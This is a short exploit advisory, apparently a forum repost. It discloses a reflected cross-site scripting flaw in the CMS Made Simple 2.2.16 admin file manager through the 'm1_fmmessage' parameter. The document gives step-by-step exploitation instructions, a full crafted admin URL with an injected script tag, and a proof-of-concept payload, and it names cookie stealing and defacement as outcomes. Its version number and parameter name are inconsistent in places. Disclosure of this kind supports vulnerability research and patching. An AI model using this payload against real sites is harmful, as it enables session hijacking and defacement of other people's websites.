CMS Made Simple 2.2.16 - Cross Site Scripting(XSS) Zero-Day
Kod:
# Exploit Title: CMS Made Simple 2.2.16 - 'm1_fmmessage' Cross-Site Scripting (XSS) Zero-Day
# Date: 2022/04/11
# Exploit Author: TurkHackTeam
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: https://s3.amazonaws.com/cmsms/downloads/14953/cmsms-2.2.16-install.zip
# Version: 2.2.16
# Cve: N/A
---------------------------------------------------------------------
Description:
A Reflected cross-site scripting (XSS) vulnerability in CMS Made Simple 2.2.15
exists in the admin console via the global parameters of 'm1_fmmessage'
parameter. Once the user completes an action, the page returns a link with
'm1_fmmessage' parameters this vulnerability allows an attacker to execute
JavaScript in the context of the victim's browser if the victim opens a
vulnerable page containing an XSS payload.lead to cookie stealing, defacement
and more.
on case Steps to exploit:
1) Navigate to http://www.cmsms.com/admin/moduleinterface.php and delete any
file in 'file manage'
2) Insert your payload in the response url "m1_fmmessages" parameter
such as:
http://www.cmsms.com/admin/moduleinterface.php?mact=FileManager,m1_,defaultadmin,0&__c=34f443492bff76e8334&m1_fileactiondelete=&m1_path=%2Fuploads%2Fimages&m1_selall=a%3A1%3A%7Bi%3A0%3Bs%3A76%3A%22OGU0ODI3MjgzMDQxMjA3MjAzM2I3MDI3YjJhMDMzMTkzMmIwODkyMnx4c3NwYXlsb2FkLnR4dA%3D%3D%22%3B%7D&m1_submit=Delete&m1_fmmessage=deletesuccess<script>alert(1);</script>
3) Refresh the page
Boom :)
Proof of concept (Poc):
The following payload will allow you to run the javascript :
<script>alert(1);</script>
---------------------------------------------------------------------